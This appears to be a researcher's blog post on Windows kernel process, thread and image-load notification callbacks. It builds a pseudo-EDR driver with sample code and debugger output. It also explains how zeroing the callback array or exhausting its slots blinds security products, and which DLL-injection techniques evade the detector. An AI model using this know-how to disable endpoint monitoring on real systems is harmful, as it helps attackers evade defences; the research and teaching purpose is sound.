I won’t be sharing any 0day here (well, maybe a “nday” if you haven’t been looking into ring0 that much). The fact is, there’s not much public information about this subject (attacks against the Windows Kernel Ps callbacks). To play a little bit with these kernel callbacks, I “wrote” (yes, in quotes) a pseudo-EDR proof-of-concept (that uses these Ps callbacks). This post tells the story of some of these ring0 experiments.
My experience with the Windows Kernel comes from writing exploits for memory corruption bugs. I’ve never worked at Microsoft or any other big hardware/AV company. I’m not a programmer, and I don’t have access to source code (besides the one that everyone has). So, my overall knowledge of the Windows kernel is limited. I found some bugs and wrote some ‘gangster’ kernel exploits, but that’s it.
What I’m trying to say is, the subject discussed here is presented in the interest of exploring the Windows kernel for self-education. I’ve tried to be as precise as possible (without being exhaustive), but it is still very likely that I made mistakes, that I’m misinformed, or that I forgot to mention something important. I apologise in advance. If you spot any mistakes/errors please let me know.
A while ago I looked at a commercial EDR solution from a low-level exploitation, and anti-tampering, perspective. I can’t disclose the name of the vendor, and I can’t talk about my findings. Don’t ask, I won’t even mention it again. However, that’s what rekindled my interest in the Windows Kernel Ps Callback Functions. These callbacks are only used in drivers, and not in the kernel per se. Many Endpoint Security solutions (anti-virus, EDRs, HIDS/HIPS, etc.) register these callbacks to monitor, and track, system activity. Kernel-mode rootkits also make use of them, sometimes. Microsoft has been improving the capabilities of these callbacks (since Vista), and software companies (like Endpoint Security vendors, and others) are shifting their hook-based monitoring technology to these Kernel Notification Callbacks (plus the obvious Ob callbacks, Cm callbacks and mini-filter drivers, even though I won’t be talking about these in this post).
Windows allows kernel drivers to register callback routines, which will then be called when a particular event occurs (like process/thread creation and termination, image loads, registry operations, and many others). When the event occurs the callback routine will be invoked, and the necessary action (such as blocking it) can be taken.
You can find a comprehensive list of all the APIs exported by the Windows Kernel for driver writers to register callback routines, which are invoked by kernel components under various circumstances, here. You can, and should, also look at the Windows Driver Kit (WDK) since they are well documented there. Note that some others are still undocumented, though.
While these Kernel Callbacks are mostly documented from a development perspective, I didn’t find much information regarding implementation weaknesses and offensive research focused on them. Initially, I mainly looked at PsSetCreateProcessNotifyRoutineEx and most of what I’m presenting here is around this process notification callback. However, it applies pretty much the same way to threads, Image loads, and Registry operations (as we’ll see).
Process notification callbacks are registered via PsSetCreateProcessNotifyRoutine, PsSetCreateProcessNotifyRoutineEx, and PsSetCreateProcessNotifyRoutineEx2. PsSetCreateProcessNotifyRoutineEx is the same as the first one but also allows you to block process creation, and PsSetCreateProcessNotifyRoutineEx2 is also invoked for Linux processes (Windows Subsystem for Linux (WSL)). We’ll ignore the last one for now. The addresses of these notify routines are added to an array, the nt!PspCreateProcessNotifyRoutine array. So whenever a process is being created (or terminated), nt!PspCallProcessNotifyRoutines iterates over this array and calls all the registered callbacks. And this is where you can start smiling. If you have done some Windows Kernel Exploitation, you know that once you have a primitive that allows you to write into kernel memory, the system is compromised. Even if you can write only 1 byte (more on this later).
Endpoint Security solutions (AVs, EDRs, Anti-Cheating Engines, etc), and others like Sysmon , Procmon , Process Explorer , and so on, they all make use of Kernel Callbacks. I “heard” that some AVs are still getting away with some forms of Kernel Hooking in 64-bit systems, relying on KPP bypasses. I won’t mention names. Anyway, all the few solutions I briefly looked at were using these Kernel Callbacks. There are some EDRs doing userland hooking but I won’t talk about those. That’s not in scope for this post. One thing I know, KPP is not available on 32-bit systems so it’s very likely that some AVs didn’t rewrite their engine for this platform. Anyway, no one cares about 32-bit anymore (including myself).
The problem here is that, as mentioned before, these callbacks are stored in an array. This means that if I can zero out that array somehow, they will stop working. If we can set callbacks, we can also delete them. Right? Well… “you need to be running code in ring zero for that” . True, but you know… since Administrator to Kernel is not a security boundary…
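To make the "zero out the array" idea concrete, here is a minimal user-mode sketch. It is only a model: NotifyArray, CallProcessNotifyRoutines, WipeNotifyArray and EdrOnProcessNotify are names made up for illustration, and the real kernel array holds encoded pointers rather than plain function pointers (more on that in the enumeration section). The point is simply that a dispatcher which walks an array stops calling anyone once the slots are empty.

```cpp
#include <array>
#include <cassert>
#include <cstddef>

// Hypothetical user-mode model; none of these names exist in the kernel.
using NotifyRoutine = void (*)(int pid, bool create);

constexpr std::size_t kMaxCallbacks = 64;   // slot limit mentioned in this post

struct NotifyArray {
    std::array<NotifyRoutine, kMaxCallbacks> slots{};   // every slot starts as nullptr
};

// Mirrors the idea behind nt!PspCallProcessNotifyRoutines: walk the array and
// call every non-empty slot. Returns how many callbacks were invoked.
std::size_t CallProcessNotifyRoutines(const NotifyArray& arr, int pid, bool create) {
    std::size_t called = 0;
    for (NotifyRoutine routine : arr.slots) {
        if (routine != nullptr) {
            routine(pid, create);
            ++called;
        }
    }
    return called;
}

// What a kernel write primitive boils down to in this model: clear every slot.
void WipeNotifyArray(NotifyArray& arr) {
    arr.slots.fill(nullptr);
}

// Stand-in for an EDR's monitoring routine; it only counts events.
static int g_eventsSeen = 0;
void EdrOnProcessNotify(int /*pid*/, bool /*create*/) { ++g_eventsSeen; }
```

Register EdrOnProcessNotify in slot 0, dispatch once, wipe the array, and dispatch again: the second dispatch reaches nobody, and the "EDR" never learns about the new process.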
Apart from the pseudo-EDR kernel driver, I also wrote an Evil kernel driver that will somehow mess with our EDR (and eventually other software making use of these same callbacks). We’ll see how it can be (ab)used, and while here also talk a little bit about Kernel Patch Protection (KPP), widely known as PatchGuard, and Driver Signature Enforcement bypasses.
If you want to follow along with this post, I recommend getting two Windows 10 VMs. One (the debugger/host) with a kernel debugger, kd.exe, from the Debugging Tools for Windows. If you feel like going crazy fancy use WinDbg Preview. Additionally, Visual Studio 2019 (the free version is enough) with the WDK, and the SDK. On the debuggee/target, I would say that you’ll only need Process Hacker. That’s it, all the required software is available for free.
As a last note, before we begin, there’s another option for being notified when processes are created, or terminated. Event Tracing for Windows (ETW) . However, it is not possible to prevent a process from being created this way. Also, there’s a considerable delay regarding the notification delivery that makes this impractical depending on your “mission”. A short-lived process can exit before the notification arrives. We won’t talk about these here. The Windows Kernel Notification Callbacks are sent as “part of” process creation, and the driver cannot miss any process created and terminated quickly.
The EDR (Kernel Mode Driver)
Writing an EDR for fun, and potential profit, if you are willing to write a web interface
I wanted to play with these Windows Kernel Ps Callbacks. However, I didn’t have an EDR, or AV to play with. Well, AVs are cheap these days, I know. But the infosec buzzword at the moment is EDR. There are plenty, but none will give me access for free to their solution to play with it. So why not write my own?
If you have never written a Windows Kernel Driver before, I recommend grabbing a copy of Windows Kernel Programming, by Pavel Yosifovich. This book kinda gives you all the foundations to write a driver using these Ps callbacks. Please note that it barely touches mini-filter drivers, but that’s not a surprise. You can pick one of his Kernel Mode Driver projects and start building on top of it. That’s what I did for the EDR kernel driver, plus many other “features” I added myself. So, if you want to do the same, or learn about the subject, look at the book. If you already know a bit about Windows Kernel programming you’ll probably hate the book; if you don’t, I believe you’ll like it and find it useful.
Moving forward, the pseudo “EDR” I wrote (at the moment) has the ability to:
- detect process creation and termination
- detect thread creation and termination
- detect Image loads
- block process creation based on the executable name
- detect DLL injection (kind of)
If you are willing to write a web interface, and you are looking for an idea to get your startup going, here it is. Grab the code, write the web interface, get some investors, slack for a year or two, sell the company, and pocket some millions (hopefully). Joking.
The code will be available on GitHub, one day. Be warned that I’m not a programmer, and I take zero responsibility for bugchecks. The focus of this post is not how to write a kernel driver. I’ll just show you how this pseudo-EDR works, you can eventually use it for your testing purposes. As of today, I didn’t bother testing the driver in multiple Windows versions. I only tested it on Windows 10 x64 1903 19H1 and a few other Windows versions. I might add support for other Windows versions but probably only for 64-bit systems. No one cares about 32-bit anymore. If you want it working on a 32-bit system it should be really easy to “fix it” though. I’ll probably do it myself at some point just for fun. Anyway, use Windows 10 x64 1903 19H1 as your target. Otherwise, there are zero guarantees that everything will work as presented here. It’s not my intention to write commercial grade rock-solid software, and honestly, this is just a PoC and I couldn’t care less about supporting multiple Windows versions.
As you might know, or not know, to load an unsigned driver you need to enable test signing mode . I won’t go through the setup steps, these have been documented all over the Internet. A simple Google search is enough to get you going. You’ll also have to setup kernel debugging as mentioned before. Again, Google is your friend (and a close one, since it knows everything about you). Use it.
Once you enable test signing mode you’ll get a nice watermark on the bottom right corner of the screen, like the one below.
You’ll have to build the code yourself, fun! If you haven’t installed Visual Studio 2019 and the WDK, in this exact order, now is the time. After building the code you’ll end up with 3 files (edr.sys, alerts.exe, and edrcli.exe). I recommend building them with debug information for a “better user experience”. Jokes aside, I added a lot of debugging information and that will help you better understand what’s going on.
Here’s the functionality of each one of the files.
- edr.sys (the pseudo-EDR kernel-mode driver)
- alerts.exe (the client that will let you get all the information from the kernel-mode driver)
- edrcli.exe (the client that lets you add process names that shouldn’t be allowed to start)
You can load the edr.sys driver the same way you install a user-mode service. You can use the CreateService API, you can use OSR driver loader, you can use whatever you want. Or, you can just use the Windows built-in, and most well known, tool for this: sc.exe, which is what I use myself. There’s no need to install any extra tools, honestly.
We can install the driver as an Administrator only. So open an elevated command prompt and type (assuming you have the driver in the Desktop folder as I do, and change the username accordingly):
sc create edr type= kernel binPath= c:\users\rui\Desktop\edr.sys
Pay attention to the spaces. You should now have the following registry key: HKLM\System\CurrentControlSet\Services\Edr. We’ll eventually talk about it later. To start the driver type:
sc start edr
I hope you have a Kernel Debugger attached by now (and hopefully the machine didn’t bugcheck), so you should see some messages with the driver prefix [EDR]. You can also use DebugView from Sysinternals to see the debug messages, just make sure you enable the kernel debug messages. To avoid a lot of noise I still recommend just using kd.exe with the following KD mask:
ed nt!Kd_Default_Mask 8
You can set Kd_Default_Mask to f to enable the error, warning, trace, and info levels, although 8 should be enough to catch our unadorned KdPrint (customized DbgPrint). To revert it:
ed nt!Kd_Default_Mask 0x0
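If you wonder why 8 is the magic number, here is a small sketch of the filtering rule as I understand it from the debugger documentation: a level between 0 and 31 is turned into a single bit, and the message is shown when that bit is set in the component mask. Plain DbgPrint/KdPrint messages go out at the info level (3), hence 1 << 3 = 8. PassesFilter and the constant names are hypothetical, and the model ignores the system-wide mask that is also consulted.

```cpp
#include <cassert>
#include <cstdint>

// Importance levels as used by DbgPrintEx (error = 0 ... info = 3).
constexpr std::uint32_t kErrorLevel   = 0;
constexpr std::uint32_t kWarningLevel = 1;
constexpr std::uint32_t kTraceLevel   = 2;
constexpr std::uint32_t kInfoLevel    = 3;

// Simplified model: levels 0..31 become the bit (1 << level); larger values
// are treated as a bit field themselves. The message passes when it shares
// at least one bit with the component mask (e.g. nt!Kd_Default_Mask).
bool PassesFilter(std::uint32_t level, std::uint32_t componentMask) {
    const std::uint32_t bits = (level < 32) ? (1u << level) : level;
    return (bits & componentMask) != 0;
}
```

With a mask of 8 only info-level messages get through, with f the four levels above all do, and with 0 nothing from the default component is shown.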
Note: if you are developing kernel-mode drivers I recommend you to automate everything as much as possible, but I’ll leave that as an exercise for you. This is just a messy demo with files all over the Desktop folder.
Let’s get started. To register, and start, your EDR driver (edr.sys) use the commands mentioned above and once you get it loaded and running use alerts.exe to see what’s going on.
If you launch alerts.exe without any parameter you’ll get all the notifications for processes, and threads, start and exit, plus Image loads as shown above. If you want a more granular view you can use the following command line switches.
Nothing fancy.
So, how does the kernel allow drivers to be notified of these specific events?
Process Notifications
As mentioned before, a driver can be notified when a process is created, or terminated, by registering a notification function with PsSetCreateProcessNotifyRoutine . Or, with PsSetCreateProcessNotifyRoutineEx , or PsSetCreateProcessNotifyRoutineEx2 .
The main API is PsSetCreateProcessNotifyRoutineEx , and that’s one we’ll be using in our pseudo-EDR driver. As we can read on MSDN, The PsSetCreateProcessNotifyRoutineEx routine registers or removes a callback routine that notifies the caller when a process is created or exits.
We can find its definition in the ntddk.h header file.
NTKERNELAPI
NTSTATUS
PsSetCreateProcessNotifyRoutineEx (
    _In_ PCREATE_PROCESS_NOTIFY_ROUTINE_EX NotifyRoutine,
    _In_ BOOLEAN Remove
    );
The first parameter is a pointer to the PCREATE_PROCESS_NOTIFY_ROUTINE_EX routine to register or remove. The operating system calls this routine whenever a new process is created.
In our driver, this routine is called OnProcessNotify and can be found in the Edr.cpp file. We register it inside the DriverEntry function, as shown below.
status = PsSetCreateProcessNotifyRoutineEx(OnProcessNotify, FALSE);
if (!NT_SUCCESS(status)) {
    KdPrint((DRIVER_PREFIX "failed to register process callback (0x%08X)\n", status));
    break;
}
Note: there’s a maximum limit of 64 callback registrations, which means the API call above can fail. This is a limitation that can be abused.
The second parameter, set to FALSE above, is a Boolean value that specifies whether PsSetCreateProcessNotifyRoutineEx will add or remove a specified routine from the list of callback routines. If this parameter is TRUE, the specified routine is removed from the list of callback routines. If this parameter is FALSE, the specified routine is added to the list of callback routines. If Remove is TRUE, the system also waits for all in-flight callback routines to complete before returning.
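The add/remove semantics and the slot limit can be sketched with a tiny user-mode model. Everything here (NotifyTable, Status, RoutineA/B/C) is hypothetical and only mimics the behaviour described above; the status values are my assumption about how the real API reports "already registered", "no free slot" and "not found", so check the documentation before relying on them.

```cpp
#include <array>
#include <cassert>
#include <cstddef>

using NotifyRoutine = void (*)();   // simplified callback type for the model

// Hypothetical stand-ins for the NTSTATUS values the real API returns.
enum class Status { Success, InvalidParameter, NotFound };

template <std::size_t Capacity = 64>   // 64 is the limit mentioned in the note above
class NotifyTable {
public:
    // remove == false: add the routine; remove == true: drop it.
    Status Set(NotifyRoutine routine, bool remove) {
        if (routine == nullptr) return Status::InvalidParameter;
        if (remove) {
            for (NotifyRoutine& slot : slots_) {
                if (slot == routine) { slot = nullptr; return Status::Success; }
            }
            return Status::NotFound;
        }
        NotifyRoutine* freeSlot = nullptr;
        for (NotifyRoutine& slot : slots_) {
            if (slot == routine) return Status::InvalidParameter;   // already registered
            if (slot == nullptr && freeSlot == nullptr) freeSlot = &slot;
        }
        if (freeSlot == nullptr) return Status::InvalidParameter;   // every slot is taken
        *freeSlot = routine;
        return Status::Success;
    }

private:
    std::array<NotifyRoutine, Capacity> slots_{};   // all nullptr initially
};

// Three distinct dummy callbacks used to exercise the table.
static int g_hits[3] = {0, 0, 0};
void RoutineA() { ++g_hits[0]; }
void RoutineB() { ++g_hits[1]; }
void RoutineC() { ++g_hits[2]; }
```

With a two-slot table (NotifyTable<2>), RoutineA and RoutineB register fine and RoutineC is refused until one of them is removed. That is the abuse hinted at in the note: whoever fills the slots first decides who gets to listen.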
Pretty simple.
The first argument, as shown above, has the following prototype (defined on the same header file).
typedef VOID (*PCREATE_PROCESS_NOTIFY_ROUTINE_EX) (
    _Inout_ PEPROCESS Process,
    _In_ HANDLE ProcessId,
    _Inout_opt_ PPS_CREATE_NOTIFY_INFO CreateInfo
    );
And the data structure for process creation is defined on the same header file, as shown below.
typedef struct _PS_CREATE_NOTIFY_INFO {
    _In_ SIZE_T Size;
    union {
        _In_ ULONG Flags;
        struct {
            _In_ ULONG FileOpenNameAvailable : 1;
            _In_ ULONG IsSubsystemProcess : 1;
            _In_ ULONG Reserved : 30;
        };
    };
    _In_ HANDLE ParentProcessId;
    _In_ CLIENT_ID CreatingThreadId;
    _Inout_ struct _FILE_OBJECT *FileObject;
    _In_ PCUNICODE_STRING ImageFileName;
    _In_opt_ PCUNICODE_STRING CommandLine;
    _Inout_ NTSTATUS CreationStatus;
} PS_CREATE_NOTIFY_INFO, *PPS_CREATE_NOTIFY_INFO;
An important field from the structure above is CreationStatus, since this is the status that will be returned to the caller. In this pseudo-EDR driver, I added the ability to block processes from starting up using this field (by setting it to STATUS_ACCESS_DENIED).
Blocking process creation
To configure which processes should be blocked, I wrote a small userland utility that communicates with the EDR driver. It allows you to add process names to a doubly-linked list ( LIST_ENTRY ) in the kernel where these process names are kept. Every time a new process starts, an in-line notification is sent to the EDR driver. The EDR driver looks at this doubly linked list and allows the process to start, or not.
This is just a proof-of-concept, so feel free to improve it. It just checks the process file name, so if you change it you bypass it. The point here is to simply make you think what are some of the limitations, or challenges that developers of this type of technology have to face. Like, where to keep this information? How to handle it? Are we going to keep a doubly linked list in the kernel with thousands of processes, command-line switches, and check it every time a new process starts? Should we use regular expressions? Parsing this in the kernel doesn’t sound like a good idea, right? Is this fine? Is this heavy? Should we use a database in user-mode? What’s the best approach to handle this? I guess you get the point.
Anyway, to add process names to this doubly linked list and block their execution you can use the edrcli.exe client with the -i switch.
Let’s say we want to block procexp64.exe from starting.
After you add it to the doubly linked list mentioned above, here’s what happens.
You can add up to 10 process names, by default. This value is hardcoded, and you can change this in the code. Check the Edr.h header file and change the define MAX_NR_PROC_TO_BLOCK. Even better would be to simply read this value from a registry key (feel free to write the code for this).
If this maximum cap is reached, the oldest one is deleted and the new one is added. See below the code responsible for this in the Edr.cpp file.
if (g_Globals.NodeCount >= MAX_NR_PROC_TO_BLOCK) {
    KdPrint(("[EDR] Max # of process to block reached. Deleting the oldest one.\n"));
    auto tail = RemoveTailList(&g_Globals.ProcListHead);
    auto record = CONTAINING_RECORD(tail, FullItem<ProcessDenyInfo>, Entry);
    ExFreePool(record);
    g_Globals.NodeCount--;
}
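The same eviction policy can be sketched in user mode with a std::list. BoundedDenyList is a hypothetical name, and the sketch assumes new entries are inserted at the head (which is what makes the tail the oldest entry, matching the RemoveTailList call above).

```cpp
#include <cassert>
#include <cstddef>
#include <list>
#include <string>

// Hypothetical user-mode counterpart of the driver's deny list.
class BoundedDenyList {
public:
    explicit BoundedDenyList(std::size_t capacity) : capacity_(capacity) {}

    void Add(const std::wstring& processName) {
        if (capacity_ == 0) return;             // nothing can ever be stored
        if (names_.size() >= capacity_) {
            names_.pop_back();                  // tail == oldest, like RemoveTailList
        }
        names_.push_front(processName);         // head == newest (assumed InsertHeadList)
    }

    const std::list<std::wstring>& Names() const { return names_; }

private:
    std::size_t capacity_;
    std::list<std::wstring> names_;
};
```

With a capacity of 2, adding a.exe, b.exe and c.exe leaves c.exe at the head and b.exe at the tail; a.exe, the oldest rule, is silently dropped. Whether silently dropping a block rule is acceptable is one of those design questions raised above.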
Anyway, if you add multiple processes and then try to get the list of the processes currently in the doubly linked list with the -l switch you’ll get:
Yep, I didn’t finish this because I didn’t care. Maybe later. However, you can still see the contents of the doubly linked list if you have a kernel debugger attached.
Feel free to write the code that sends this data back to the user-mode client. I have multiple examples of how to do it in the Visual Studio project. Anyway, how is this achieved? Inside our OnProcessNotify function, we have the following.
if (CreateInfo) {
    if(!IsListEmpty(&g_Globals.ProcListHead)) {
        AutoLock<FastMutex> lock(g_Globals.ProcMutex);
        PLIST_ENTRY pENTRY = g_Globals.ProcListHead.Flink;
        while(pENTRY != &g_Globals.ProcListHead) {
            auto node = CONTAINING_RECORD(pENTRY, FullItem<ProcessDenyInfo>, Entry);
            auto pname = node->Data.ProcessName;
            KdPrint((DRIVER_PREFIX " -> %S\n", pname));
            if (wcsstr(CreateInfo->ImageFileName->Buffer, pname)) {
                CreateInfo->CreationStatus = STATUS_ACCESS_DENIED;
                KdPrint((DRIVER_PREFIX "No Way Jose! Access to: \"%S\" is... Denied!!!\n", pname));
                return;
            }
            pENTRY = pENTRY->Flink;
        }
    }
(...)
As we can see from above, we have a mutex that guarantees that the doubly linked list, where we keep the names of the processes that we want to block, is not being manipulated while we walk it. Then, we iterate over the list in the while loop and if the process name matches we set the structure field mentioned above (CreationStatus) to STATUS_ACCESS_DENIED. Simple. This shouldn’t be done with process names (but hashed values) for obvious reasons, but bear with me.
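To show why matching on names is fragile, here is a user-mode sketch comparing the substring test used above with a slightly stricter match on the file name component, ignoring case. All function names are made up for illustration, and neither variant survives a simple rename of the binary, which is exactly the limitation mentioned earlier.

```cpp
#include <cassert>
#include <cstddef>
#include <cwctype>
#include <string>

// Returns the part after the last backslash (the whole string if there is none).
std::wstring FileNameOf(const std::wstring& path) {
    const std::size_t pos = path.find_last_of(L'\\');
    return (pos == std::wstring::npos) ? path : path.substr(pos + 1);
}

// Lower-cases a copy of the string, one character at a time.
std::wstring ToLower(std::wstring s) {
    for (wchar_t& c : s) c = static_cast<wchar_t>(std::towlower(c));
    return s;
}

// Equivalent of the wcsstr check: case-sensitive, matches anywhere in the path.
bool MatchesBySubstring(const std::wstring& imagePath, const std::wstring& rule) {
    return imagePath.find(rule) != std::wstring::npos;
}

// Stricter variant: compare only the final path component, ignoring case.
bool MatchesByFileName(const std::wstring& imagePath, const std::wstring& rule) {
    return ToLower(FileNameOf(imagePath)) == ToLower(rule);
}
```

The substring test misses PROCEXP64.EXE (case) and wrongly blocks anything living under a directory whose name contains the rule; the file name test fixes both, but renamed.exe still walks straight through.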
If you have a debugger attached you can also see the following debug message if there’s a match.
If you want to look at the code responsible for adding a process name to the doubly linked list, you can look at the EdrDeviceControl function, where the IOCTL_EDR_ADD_DENY_RULE is handled (right below the code shown above). I’m simply using the LIST_ENTRY API calls to manage the doubly linked list.
DLL injection detection
The DLL injection detection mechanism I implemented in the kernel driver is very simple, actually basic. Still, it gives you an idea of how hard it can be to develop something that doesn’t trigger many false positives and, at the same time, covers all the possible DLL injection techniques there are. We aren’t even talking about code injection techniques, just DLL injection (which is only a subset of code injection).
Knowing that the first thread in a process is always remotely created, our heuristic is simple. If a process has more than one thread, and we see another remotely created thread we flag it as DLL injection (with the caveat described below). This is not bulletproof and while it works for the typical CreateRemoteThread it won’t work so well for a few more obscure techniques as we will see.
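Stripped of all kernel details, the heuristic fits in a few lines. The sketch below is a user-mode model with hypothetical names (ThreadCreateEvent, LooksLikeRemoteThreadInjection); it assumes the thread count seen at callback time already includes the new thread, which is how the driver code later in this post treats it.

```cpp
#include <cassert>
#include <cstdint>

constexpr std::uint32_t kSystemPid = 4;   // the System process is ignored

struct ThreadCreateEvent {
    std::uint32_t creatorPid;            // process whose thread asked for the new thread
    std::uint32_t targetPid;             // process that receives the new thread
    std::uint32_t targetActiveThreads;   // target's thread count as seen by the callback
};

// Flags a thread created from another process, unless it is the very first
// thread of the target (which is always created remotely).
bool LooksLikeRemoteThreadInjection(const ThreadCreateEvent& e) {
    if (e.creatorPid == kSystemPid) return false;    // Windows itself does this all the time
    if (e.creatorPid == e.targetPid) return false;   // ordinary local thread
    return e.targetActiveThreads > 1;
}
```

Note what the model cannot see: techniques that never create a new thread in the target (APC queuing, window hooks, hijacking an existing thread's context) produce no event for it to judge at all.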
Again, the logic behind this detection is quite simple. However, believe it, or not, this method is used in multiple AV solutions. As we all know, a lot of “malware” injects code/threads into other/remote processes to avoid detection. The typical, and most basic scenario as referenced above is to use the WriteProcessMemory API to write data/shellcode to an area of memory in a specified process, and then call CreateRemoteThread . This is a very well documented technique, and there’s plenty of source code available online to do this. Windows itself uses it all the time. Anyway, I wrote a simple (and ugly) DLL injection tool a while ago that you can use for testing. It contains 7 different DLL injection techniques and can be found here .
Thread Notifications
The kernel also provides an API call for thread creation and termination notifications, just like for process callbacks. The API is PsSetCreateThreadNotifyRoutine. To unregister, this time, we have a second API call, PsRemoveCreateThreadNotifyRoutine. The callback routine receives the process ID, the thread ID, and a boolean value indicating whether the thread is being created or terminated.
You can find all these definitions in the ntddk.h header file already mentioned.
typedef VOID (*PCREATE_THREAD_NOTIFY_ROUTINE)(
    _In_ HANDLE ProcessId,
    _In_ HANDLE ThreadId,
    _In_ BOOLEAN Create
    );

NTKERNELAPI
NTSTATUS
PsSetCreateThreadNotifyRoutine(
    _In_ PCREATE_THREAD_NOTIFY_ROUTINE NotifyRoutine
    );

NTKERNELAPI
NTSTATUS
PsRemoveCreateThreadNotifyRoutine (
    _In_ PCREATE_THREAD_NOTIFY_ROUTINE NotifyRoutine
    );
In our pseudo-EDR driver we register our callback function (OnThreadNotify) as shown below in the DriverEntry function:
status = PsSetCreateThreadNotifyRoutine(OnThreadNotify);
if (!NT_SUCCESS(status)) {
    KdPrint((DRIVER_PREFIX "failed to set thread callback (status=%08X)\n", status));
    break;
}
So, to detect DLL injection, in our OnThreadNotify function, which is called in-line every time a thread is created/terminated, we can do something like this (pseudo-code):
void OnThreadNotify(HANDLE RemoteProcessId, HANDLE ThreadId, BOOLEAN Create)
{
    currentProcess = GetCurrentProcess()
    if currentProcess not equal to RemoteProcessId
        THREAD INJECTION DETECTED
}
Quite simply, if the current process and the remote process are different it means the thread has been injected. This is not good enough because of what I mentioned before: in Windows, the first thread is always created remotely. So, in our OnThreadNotify function, we use PsLookupProcessByProcessId to obtain a referenced pointer to the EPROCESS structure of the process.
We are interested in the ActiveThreads field of the EPROCESS structure. This structure is not documented but we can look at it in a debugger. Here’s its definition on Windows 10 x64 1903 (OS Build 18362.592).
0: kd> dt nt!_EPROCESS
nt!_EPROCESS
   +0x000 Pcb : _KPROCESS
   +0x2e0 ProcessLock : _EX_PUSH_LOCK
   +0x2e8 UniqueProcessId : Ptr64 Void
   +0x2f0 ActiveProcessLinks : _LIST_ENTRY
   (...)
   +0x448 ImageFilePointer : Ptr64 _FILE_OBJECT
   +0x450 ImageFileName : [15] UChar
   +0x45f PriorityClass : UChar
   (...)
   +0x488 ThreadListHead : _LIST_ENTRY
   +0x498 ActiveThreads : Uint4B <-------------
   +0x49c ImagePathHash : Uint4B
   (...)
   +0x878 MmHotPatchContext : Ptr64 Void
The code responsible for what’s described above is below.
Warning: there are hardcoded offsets all over the place, these will be fixed at some point.
status = PsLookupProcessByProcessId(ProcessId, &Process);
if (!NT_SUCCESS(status)) {
    KdPrint(("PsLookupProcessByProcessId()\n"));
    return;
}

idProcess = PsGetCurrentProcessId();
idThread = PsGetCurrentThreadId();

if (HandleToULong(idProcess) == 4) // ignore the system process
{
    ObDereferenceObject(Process); // drop the reference taken by PsLookupProcessByProcessId
    return;
}

lpProcess = (LPTSTR)Process;
lpProcess = (LPTSTR)(lpProcess + 0x450); // ImageFileName dt _EPROCESS

if (idProcess != ProcessId) {
    PEPROCESS iProcess;
    LPTSTR lpProcessIn;

    status = PsLookupProcessByProcessId(idProcess, &iProcess);
    if (NT_SUCCESS(status)) {
        lpProcessIn = (LPTSTR)iProcess;
        lpProcessIn = (LPTSTR)(lpProcessIn + 0x450); // ImageFileName dt _EPROCESS

        // 0x450 + 0x48 = 0x498, ActiveThreads (Uint4B) dt _EPROCESS; assumes LPTSTR is a byte pointer
        ULONG ActiveThreads = *(PULONG)(lpProcess + 0x48);

        if (ActiveThreads > 1) // first thread is always created remotely
            KdPrint(("[EDR Thread Injection] Remote Process %d (%s) <thread %d> was injected by Process %d (%s) <thread %d> | Remote Process # Threads: %d\n", ProcessId, lpProcess, ThreadId, idProcess, lpProcessIn, idThread, ActiveThreads));

        ObDereferenceObject(iProcess); // release the second lookup's reference
    }
}
Warning: As you can see from above, ImageFileName is [15] UChar, so a process name that doesn’t fit in those 15 bytes is going to be truncated. It doesn’t matter, but if you are aiming for perfection use the field SeAuditProcessCreationInfo.
For example:
0: kd> dt nt!_EPROCESS SeAuditProcessCreationInfo. ffff8882af0c2080
   +0x468 SeAuditProcessCreationInfo :
      +0x000 ImageFileName : 0xffff8882`af8c3850 _OBJECT_NAME_INFORMATION
0: kd> dt _OBJECT_NAME_INFORMATION 0xffff8882`af8c3850
nt!_OBJECT_NAME_INFORMATION
   +0x000 Name : _UNICODE_STRING "\Device\HarddiskVolume3\Users\rui\Desktop\procexp64.exe"
Note that we ignore the SYSTEM process because we aren’t interested in it, and Windows itself does DLL injection all the time.
We can quickly demo this with the DLL injection binaries I mentioned above. Please attach a kernel debugger to the target VM and don’t forget to enter ed nt!Kd_Default_Mask 8 to see the debug messages. DLL injection is not blocked, simply logged, and you won’t be able to see these being flagged without a kernel debugger attached. As a target process, we’ll be using notepad.exe.
And we can see the following in our kernel debugger.
And if we look at the notepad.exe process with Process Hacker we can see that we have indeed 8 threads and we can easily identify the injected thread. Right?
If you aren’t familiar with how the CreateRemoteThread DLL injection technique works I recommend you to read the injector source code or this post. Anyway, the remote thread we created executes LoadLibraryW and we can easily identify that thread (6316) with Process Hacker and in the log message displayed in our debugger.
We can now try to play with the injectAllTheThings binary and see if “our” pseudo-EDR can detect other DLL injection techniques that don’t follow this usual pattern.
We already tried the first technique, so let’s try the second one, using NtCreateThreadEx. Even though this API is undocumented, the technique itself is still pretty much the same as the one we used above.
Still detected.
Let’s try the next one. This time using the QueueUserAPC API. Again, if you don’t know how these techniques work under the hood have a look at this post.
This time, we didn’t get any “alert” in our kernel debugger. So, no detection. Hmm, stealthy DLL injection technique for the red teamers out there?
Let’s move to the next one using SetWindowsHookEx .
Again, no detection. If you don’t see the MessageBox please see the post I mentioned before describing how these techniques work. Anyway, another stealthy one for red teamers?
Let’s try the next one, RtlCreateUserThread .
This time, the DLL injection was detected (as expected).
Let’s try the next one, SetThreadContext .
As expected, not detected. Finally, let’s try the famous Reflective DLL injection technique by Stephen Fewer.
Detected again. Cool!
The results are not surprising if you played with this before. The idea of going through all the techniques was more to show you how you can use these small projects to help you test against some detection mechanisms employed by Endpoint Security products. I used injectAllTheThings.exe multiple times to help me work around detections, and I know at least two consultancy (red) teams that also use it regularly, and successfully. You now know that the technique used in the pseudo-EDR is not enough to detect certain techniques. You know what its weaknesses are. So start improving it!
As you can see it’s not an easy task to cover all possible code injection techniques from a detection point of view. We (well, not me) sometimes laugh at security products. However, in some cases (not always), if we start playing on the other side it’s not so funny.
Image Load Notifications
Any Endpoint Security software is heavily interested in Image loads. Every time a PE image (EXE, DLL, SYS, CPL, …) file loads our pseudo-EDR will receive a notification. We can register for these notifications by using the API call PsSetLoadImageNotifyRoutine. To stop receiving them, we can unregister by using the API call PsRemoveLoadImageNotifyRoutine.
We can find its definition in the ntddk.h file:
typedef VOID (*PLOAD_IMAGE_NOTIFY_ROUTINE)(
    _In_opt_ PUNICODE_STRING FullImageName,
    _In_ HANDLE ProcessId, // pid into which image is being mapped
    _In_ PIMAGE_INFO ImageInfo
    );
In our driver, we register for image load notifications in the DriverEntry function.
status = PsSetLoadImageNotifyRoutine(OnImageLoadNotify);
if (!NT_SUCCESS(status)) {
    KdPrint((DRIVER_PREFIX "failed to set image load callback (status=%08X)\n", status));
    break;
}
